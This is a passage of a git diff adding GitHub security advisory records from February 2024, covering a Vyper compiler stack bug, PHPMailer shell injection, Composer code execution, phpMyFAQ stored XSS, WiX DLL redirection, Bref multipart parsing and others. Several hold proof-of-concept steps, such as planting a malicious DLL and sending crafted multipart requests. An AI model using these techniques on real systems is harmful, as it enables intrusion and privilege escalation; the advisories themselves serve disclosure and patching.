compiled:\nhttps://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586\n\nAs can be seen, after compiling the 0th arg, the `height` variable isn't increased. If new `withargs` are defined in the inner scope, they are manipulated correctly, because both their `height` is off and also the global `height` is off and thus their placement on the stack is computed correctly.\n\n`sha3_64` is used for retrieval in mappings. No flow that would cache the `key` was found, the issue shouldn't be possible to trigger when compiling the compiler-generated `IR`.\n\n### PoC\nSuppose the following hand-written IR:\n```lisp\n(with _loc\n\t(with val 1 \n\t\t(with key 2 \n\t\t\t(sha3_64 val key))) \n\t\t\t\t(seq \n\t\t\t\t\t(sstore _loc \n\t\t\t\t\t(with x (sload _loc) \n\t\t\t\t\t\t(with ans (add x 1) (seq (assert (ge ans x)) ans))))))\n```\nafter compilation:\n```\nthe generated bytecode: 6001600281806020525f5260405f2090509050805460018101818110610026579050815550005b5f80fd\n\n0000 60 PUSH1 0x01\n0002 60 PUSH1 0x02\n0004 81 DUP2\n0005 80 DUP1 *********** bad code here!!!!!!\n0006 60 PUSH1 0x20\n0008 52 MSTORE\n```\n\nIt can be seen that the second `DUP` will dup the item on the top of the stack which is incorrect.\n\n### Impact\nVersions v0.2.0-v0.3.10 were evaluated, and access of the variable with the invalid height is not reachable from IR generated by the vyper front-end. Because the issue isn't triggered during normal compilation of vyper code, the impact is considered low.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-6845-xw22-ffxv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24559" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vyperlang/vyper" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T19:21:52Z", + "nvd_published_at": "2024-02-05T21:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-6h78-85v2-mmch/GHSA-6h78-85v2-mmch.json b/advisories/github-reviewed/2024/02/GHSA-6h78-85v2-mmch/GHSA-6h78-85v2-mmch.json new file mode 100644 index 0000000000000..0f9cb4289c765 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-6h78-85v2-mmch/GHSA-6h78-85v2-mmch.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h78-85v2-mmch", + "modified": "2024-02-02T20:43:55Z", + "published": "2024-02-02T20:43:55Z", + "aliases": [ + "CVE-2007-3215" + ], + "summary": "PHPMailer Shell command injection", + "details": "PHPMailer before 1.7.4, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in `class.phpmailer.php`.\n\n### Impact\nShell command injection, remotely exploitable if host application does not filter user data appropriately.\n\n### Patches\nFixed in 1.7.4\n\n### Workarounds\nFilter and validate user-supplied data before putting in the into the `Sender` property.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2007-3215\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmailer/phpmailer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.7.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-6h78-85v2-mmch" + }, + { + "type": "WEB", + "url": "https://cxsecurity.com/issue/WLB-2007060063" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34818" + }, + { + "type": "PACKAGE", + "url": "https://github.com/PHPMailer/PHPMailer" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2011/Oct/223" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/p/phpmailer/bugs/192/" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20070714054359/http://larholm.com/2007/06/11/phpmailer-0day-remote-execution/" + }, + { + "type": "WEB", + "url": "https://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_rce" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:43:55Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-7c6p-848j-wh5h/GHSA-7c6p-848j-wh5h.json b/advisories/github-reviewed/2024/02/GHSA-7c6p-848j-wh5h/GHSA-7c6p-848j-wh5h.json new file mode 100644 index 0000000000000..5d617929fd8ed --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-7c6p-848j-wh5h/GHSA-7c6p-848j-wh5h.json @@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7c6p-848j-wh5h", + "modified": "2024-02-08T15:06:38Z", + "published": "2024-02-08T15:06:38Z", + "aliases": [ + "CVE-2024-24821" + ], + "summary": "Composer code execution and possible privilege escalation via compromised InstalledVersions.php or installed.php", + "details": "### Impact\n\nSeveral files within the local working directory are included during the invocation of Composer and in the context of the executing user.\n\nAs such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files.\n\nAll Composer CLI commands are affected, including composer.phar's self-update.\n\nThe following are of high risk:\n\n- Composer being run with sudo.\n- Pipelines which may execute Composer on untrusted projects.\n- Shared environments with developers who run Composer individually on the same project.\n\n### Patches\n\n2.7.0, 2.2.23\n\n### Workarounds\n\n- It is advised that the patched versions are applied at the earliest convenience.\n\nWhere not possible, the following should be addressed:\n- Remove all sudo composer privileges for all users to mitigate root privilege escalation. \n- Avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. \n\nA reset can also be done on these files by the following:\n\n```sh\nrm vendor/composer/installed.php vendor/composer/InstalledVersions.php\ncomposer install --no-scripts --no-plugins\n```", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "composer/composer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0-alpha1" + }, + { + "fixed": "2.2.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "composer/composer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0-rc1" + }, + { + "fixed": "2.7.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/composer/composer/security/advisories/GHSA-7c6p-848j-wh5h" + }, + { + "type": "WEB", + "url": "https://github.com/composer/composer/commit/64e4eb356b159a30c766cd1ea83450a38dc23bf5" + }, + { + "type": "WEB", + "url": "https://github.com/composer/composer/commit/77e3982918bc1d886843dc3d5e575e7e871b27b7" + }, + { + "type": "PACKAGE", + "url": "https://github.com/composer/composer" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:06:38Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-7f32-hm4h-w77q/GHSA-7f32-hm4h-w77q.json b/advisories/github-reviewed/2024/02/GHSA-7f32-hm4h-w77q/GHSA-7f32-hm4h-w77q.json new file mode 100644 index 0000000000000..e82a05c66009d --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-7f32-hm4h-w77q/GHSA-7f32-hm4h-w77q.json @@ -0,0 +1,79 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f32-hm4h-w77q", + "modified": "2024-02-03T00:22:22Z", + "published": "2024-02-03T00:22:22Z", + "aliases": [ + + ], + "summary": "github-slug-action use of `set-env` Runner commands which are processed via stdout", + "details": "### Impact\nThis GitHub Action use `set-env` runner commands which are processed via stdout related to GHSA-mfwh-5m23-j46w\n\n### Patches\nThe following versions use the recommended [Environment File Syntax](https://github.com/actions/toolkit/blob/main/docs/commands.md#environment-files).\n\n- 2.1.1\n- 1.1.1\n\n### Workarounds\nNone, it is strongly suggested that you upgrade as soon as possible.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [rlespinasse/github-slug-action](https://github.com/rlespinasse/github-slug-action)\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "GitHub Actions", + "name": "rlespinasse/github-slug-action" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.0" + } + }, + { + "package": { + "ecosystem": "GitHub Actions", + "name": "rlespinasse/github-slug-action" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.1.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.1.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rlespinasse/github-slug-action/security/advisories/GHSA-7f32-hm4h-w77q" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rlespinasse/github-slug-action" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:22:22Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-7m8g-fprr-47fx/GHSA-7m8g-fprr-47fx.json b/advisories/github-reviewed/2024/02/GHSA-7m8g-fprr-47fx/GHSA-7m8g-fprr-47fx.json new file mode 100644 index 0000000000000..11dd61084721b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-7m8g-fprr-47fx/GHSA-7m8g-fprr-47fx.json @@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m8g-fprr-47fx", + "modified": "2024-02-05T23:08:13Z", + "published": "2024-02-05T20:22:05Z", + "aliases": [ + "CVE-2024-24574" + ], + "summary": "phpMyFAQ vulnerable to stored XSS on attachments filename", + "details": "### Summary\nUnsafe echo of filename in phpMyFAQ\\phpmyfaq\\admin\\attachments.php leading to allow execute JavaScript code in client side (XSS)\n\n### Details\nOn that snippet code of rendering the file attachments from user tables\n\n```\n\n id ?>\" title=\"thema ?>\">\n id ?>\n filename ?>\n record_lang ?>\n filesize) ?>\n mime_type ?>\n \n```\n\nThe data directly rendering with short hand echo without any sanitation first, its recommend to use existing class of `Strings::htmlentities` on use `phpMyFAQ\\Strings;`\n\n```\nfilename); ?>\nrecord_lang); ?>\nfilesize) ?>\nmime_type); ?>\n```\n\nPropose fixing on that pull request https://github.com/thorsten/phpMyFAQ/pull/2827\n\n### PoC\n1. An attacker with permission will upload the attachments image on [http://{base_url}/admin/?action=editentry](http://{base_url}/admin/?action=editentry)\n2. On endpoint of ajax upload image POST /admin/index.php?action=ajax&ajax=att&ajaxaction=upload \n3. Change the originally name file on parameters filename to a XSS payload \n4. The XSS will trigger on attachment pages /admin/?action=attachments\n\n- Trigger XSS\n![image](https://user-images.githubusercontent.com/37658579/301022211-81da265b-5dce-48bd-a043-8bae0991fe46.png)\n\n- Payload XSS\n\"image\"\n\n\n\n\n### Impact\n\nThis vulnerability will allow an attacker with a permissions of uploading an attachment to storing the payload of XSS on database specific table `faqattachment` columns `filename.`\n\nThe XSS payload could be rendering on page that listing the file on tables, and impact to others user that on the hierarchy. \n\nThe payload XSS have several attack scenario such like \n\n1. Stealing the cookies (isn’t possible since HttpOnly)\n2. Crashing the application with a looping javascript payload\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyfaq/phpmyfaq" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7m8g-fprr-47fx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24574" + }, + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/pull/2827" + }, + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/commit/5479b4a4603cce71aa7eb4437f1c201153a1f1f5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/thorsten/phpMyFAQ" + }, + { + "type": "WEB", + "url": "https://www.phpmyfaq.de/security/advisory-2024-02-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79", + "CWE-80" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:22:05Z", + "nvd_published_at": "2024-02-05T21:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-7qw4-9r68-2rmx/GHSA-7qw4-9r68-2rmx.json b/advisories/github-reviewed/2024/02/GHSA-7qw4-9r68-2rmx/GHSA-7qw4-9r68-2rmx.json new file mode 100644 index 0000000000000..72092cf9d917d --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-7qw4-9r68-2rmx/GHSA-7qw4-9r68-2rmx.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qw4-9r68-2rmx", + "modified": "2024-02-05T22:34:09Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2024-22567" + ], + "summary": "mingSoft MCMS File Upload vulnerability", + "details": "File Upload vulnerability in MCMS 5.3.5 allows attackers to upload arbitrary files via crafted POST request to /ms/file/upload.do.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "net.mingsoft:ms-mcms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "5.3.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22567" + }, + { + "type": "WEB", + "url": "https://github.com/h3ak/MCMS-CVE-Request/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ming-soft/MCMS" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:34:09Z", + "nvd_published_at": "2024-02-05T20:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-7wh2-wxc7-9ph5/GHSA-7wh2-wxc7-9ph5.json b/advisories/github-reviewed/2024/02/GHSA-7wh2-wxc7-9ph5/GHSA-7wh2-wxc7-9ph5.json new file mode 100644 index 0000000000000..4025f57f49ff5 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-7wh2-wxc7-9ph5/GHSA-7wh2-wxc7-9ph5.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7wh2-wxc7-9ph5", + "modified": "2024-02-08T18:23:49Z", + "published": "2024-02-08T18:23:49Z", + "aliases": [ + "CVE-2024-24810" + ], + "summary": "WiX Toolset's .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", + "details": "### Summary\n.be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges.\n\n### Details\nIf the bundle is not run as admin, the user's TEMP folder is used and not the system TEMP folder. A utility is able to monitor the user's TEMP folder for changes and drop its own DLL into the **.be/.Local** folder immediately when the .be folder is created. When the burn engine elevates, the malicious DLL receives elevated privileges.\n\n### PoC\nAs a standard, non-admin user:\n1. Monitor the user's TEMP folder for changes using ReadDirectoryChangesW\n2. On FILE_ACTION_ADDED, check if the folder name is .be\n3. Create a folder in .be named after the bundle + .Local (e.g. MyInstaller.exe.Local)\n4. Put the malicious COMCTL32.DLL in the .Local folder following the naming used for the real DLL (e.g. MyInstaller.exe.Local/x86_microsoft.windows.common-controls_.../COMCTL32.dll)\n5. Do hacker things when the engine escalates and the malicious DLL is loaded\n\nProper naming for the path can be obtained by using GetModuleHandle(\"comctl32.dll\") and GetModuleFileName.\n\n### Impact\nDLL redirection utilizing .exe.Local Windows capability. This impacts any installer built with the WiX installer framework.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "WiX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.0.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.0.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/wixtoolset/issues/security/advisories/GHSA-7wh2-wxc7-9ph5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24810" + }, + { + "type": "WEB", + "url": "https://github.com/wixtoolset/wix/commit/fec38b6461d0551339139a2fe52403a61942adc0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/wixtoolset/wix" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:23:49Z", + "nvd_published_at": "2024-02-07T03:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-82vx-mm6r-gg8w/GHSA-82vx-mm6r-gg8w.json b/advisories/github-reviewed/2024/02/GHSA-82vx-mm6r-gg8w/GHSA-82vx-mm6r-gg8w.json new file mode 100644 index 0000000000000..e2bd7e4746cb9 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-82vx-mm6r-gg8w/GHSA-82vx-mm6r-gg8w.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82vx-mm6r-gg8w", + "modified": "2024-02-01T22:47:29Z", + "published": "2024-02-01T22:47:29Z", + "aliases": [ + "CVE-2024-24754" + ], + "summary": "Bref vulnerable to Body Parsing Inconsistency in Event-Driven Functions", + "details": "## Impacted Resources\n\nbref/src/Event/Http/Psr7Bridge.php:130-168\n\n## Description\n\nWhen Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object.\nDuring the conversion process, if the request is a MultiPart, each part is parsed and its content added in the `$files` or `$parsedBody` arrays.\nTo do that, the following method is called with as first argument the result array (`$files` or `$parsedBody`), as second argument the part name, and as third argument the part content:\n\n```php\n/**\n * Parse a string key like \"files[id_cards][jpg][]\" and do $array['files']['id_cards']['jpg'][] = $value\n */\nprivate static function parseKeyAndInsertValueInArray(array &$array, string $key, mixed $value): void\n{\n if (! str_contains($key, '[')) {\n $array[$key] = $value;\n\n return;\n }\n\n $parts = explode('[', $key); // files[id_cards][jpg][] => [ 'files', 'id_cards]', 'jpg]', ']' ]\n $pointer = &$array;\n\n foreach ($parts as $k => $part) {\n if ($k === 0) {\n $pointer = &$pointer[$part];\n\n continue;\n }\n\n // Skip two special cases:\n // [[ in the key produces empty string\n // [test : starts with [ but does not end with ]\n if ($part === '' || ! str_ends_with($part, ']')) {\n // Malformed key, we use it \"as is\"\n $array[$key] = $value;\n\n return;\n }\n\n $part = substr($part, 0, -1); // The last char is a ] => remove it to have the real key\n\n if ($part === '') { // [] case\n $pointer = &$pointer[];\n } else {\n $pointer = &$pointer[$part];\n }\n }\n\n $pointer = $value;\n}\n```\n\nThe conversion process produces a different output compared to the one of plain PHP when keys ending with and open square bracket (`[`) are used.\n\nLet's take for example the following part:\n```\n------WebKitFormBoundary\nContent-Disposition: form-data; name=\"key0[key1][key2][\"\n\nvalue\n------WebKitFormBoundary--\n```\n\nIn plain PHP it would be converted to `Array( [key0] => Array ( [key1] => Array ( [key2] => value) ) )`, while in Bref it would be converted to `Array( [key0] => Array ( [key1] => Array ( [key2] => ) ) [key0[key1][key2][] => value )`.\n\n## Impact\n\nBased on the application logic the difference in the body parsing might lead to vulnerabilities and/or undefined behaviors.\n\n## PoC\n\n1. Create a new Bref project.\n2. Create an `index.php` file with the following content:\n```php\ngetParsedBody(),true));\n }\n}\n\nreturn new MyHttpHandler();\n\n```\n3. Use the following `serverless.yml` to deploy the Lambda:\n```yaml\nservice: app\n\nprovider:\n name: aws\n region: eu-central-1\n\nplugins:\n - ./vendor/bref/bref\n\n# Exclude files from deployment\npackage:\n patterns:\n - '!node_modules/**'\n - '!tests/**'\n\nfunctions:\n api:\n handler: index.php\n runtime: php-83\n events:\n - httpApi: 'ANY /upload'\n```\n4. Replay the following request after having replaced the `` placeholder with the deployed Lambda domain:\n```\nPOST /upload HTTP/2\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Length: 180\n\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Disposition: form-data; name=\"key0[key1][key2][\"\n\nvalue\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb--\n```\n5. Notice how the body has been parsed.\n6. Create a `plain.php` file with the following content:\n```php\n` placeholder with the PHP server address:\n```\nPOST /plain.php HTTP/1.1\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Length: 180\n\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Disposition: form-data; name=\"key0[key1][key2][\"\n\nvalue\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb--\n```\n9. Notice the differences in the parsing compared to what observed at step 5.\n\n## Suggested Remediation\n\nUse the PHP function [`parse_str`](https://www.php.net/manual/en/function.parse-str.php) to parse the body parameters to mimic the plain PHP behavior.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "bref/bref" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/security/advisories/GHSA-82vx-mm6r-gg8w" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24754" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/commit/c77d9f5abf021f29fa96b5720b7b84adbd199092" + }, + { + "type": "PACKAGE", + "url": "https://github.com/brefphp/bref" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/blob/2.1.12/src/Event/Http/Psr7Bridge.php#L130-L168" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-436" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T22:47:29Z", + "nvd_published_at": "2024-02-01T16:17:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-833m-37f7-jq55/GHSA-833m-37f7-jq55.json b/advisories/github-reviewed/2024/02/GHSA-833m-37f7-jq55/GHSA-833m-37f7-jq55.json new file mode 100644 index 0000000000000..0eca9c9633819 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-833m-37f7-jq55/GHSA-833m-37f7-jq55.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-833m-37f7-jq55", + "modified": "2024-02-08T18:46:23Z", + "published": "2024-02-08T18:46:23Z", + "aliases": [ + "CVE-2023-32192" + ], + "summary": "Rancher API Server Cross-site Scripting Vulnerability", + "details": "### Impact\nA vulnerability has been identified in which unauthenticated cross-site scripting (XSS) in the API Server's public API endpoint can be exploited. This can lead to an attacker exploiting the vulnerability to trigger JavaScript code and execute commands remotely. \n\nThe attack vector was identified as a Reflected XSS.\n\nAPI Server propagates malicious payloads from user input to the UI, which renders the output. For example, a malicious URL gets rendered into a script that is executed on a page.\n\nThe changes addressed by this fix are:\n- Encode input that comes from the request URL before adding it to the response.\n- The request input is escaped by changing the URL construction that is used for links to use `url.URL`.\n- The request input is escaped by escaping the JavaScript and CSS variables with attribute encoding as defined by [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary).\n\n### Patches\nPatched versions include the following commits:\n\n| Branch | Commit |\n| -------- | ------- |\n| master | 4fd7d82 |\n| release/v2.8 | 69b3c2b |\n| release/v2.8.s3 | a3b9e37 |\n| release/v2.7 | 4e102cf |\n| release/v2.7.s3 | 97a10a3 |\n| release/v2.6 | 4df268e |\n\n### Workarounds\nThere is no direct mitigation besides updating API Server to a patched version.\n\n### References\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security-related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/apiserver" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20240207153957-4fd7d821d952" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/security/advisories/GHSA-833m-37f7-jq55" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/4df268e250f625fa323349062636496e0aeff4e4" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/4e102cf0d07b1af3d10d82c3e5a751a869b8a6c7" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/4fd7d821d952510bfe38c9d4a3e2a65157f50525" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/69b3c2b56f3fa5a421889c533dada8cd08783cda" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/97a10a30200cb851afd8ee85ee6b2295c4b6e5ee" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/a3b9e3721c1b558ee63aec9594e37c223a5c8437" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rancher/apiserver" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-80" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:46:23Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-84x2-2qv6-qg56/GHSA-84x2-2qv6-qg56.json b/advisories/github-reviewed/2024/02/GHSA-84x2-2qv6-qg56/GHSA-84x2-2qv6-qg56.json new file mode 100644 index 0000000000000..0f79f07fc5865 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-84x2-2qv6-qg56/GHSA-84x2-2qv6-qg56.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-84x2-2qv6-qg56", + "modified": "2024-02-02T22:21:27Z", + "published": "2024-02-02T22:21:27Z", + "aliases": [ + + ], + "summary": "Nervos CKB P2P DoS Attacks", + "details": "The P2P protocols lack of rate limit. For example, in relay protocol, when a node receives a broadcasted `tx_hashes`, it will mark it in memory to avoid duplicated requests. [code → ](https://github.com/nervosnetwork/ckb/blob/26e4837212c392c3c706a0da7a056131fb060433/sync/src/relayer/transactions_process.rs#L67).\n\nIt is easy to establish a DoS attach by generating random tx hashes.\n\n### Impact\n\nIt affects all nodes connected to the P2P network.\n\n### Workarounds\n\nApply rate limit on the data sent to CKB P2P port.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.34.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-84x2-2qv6-qg56" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/c5eb5478b635cea2ccef8676cf97692cd38293c3" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T22:21:27Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-87m3-6qj3-p3xh/GHSA-87m3-6qj3-p3xh.json b/advisories/github-reviewed/2024/02/GHSA-87m3-6qj3-p3xh/GHSA-87m3-6qj3-p3xh.json new file mode 100644 index 0000000000000..7e4f6fa679c5d --- /dev/null +++ 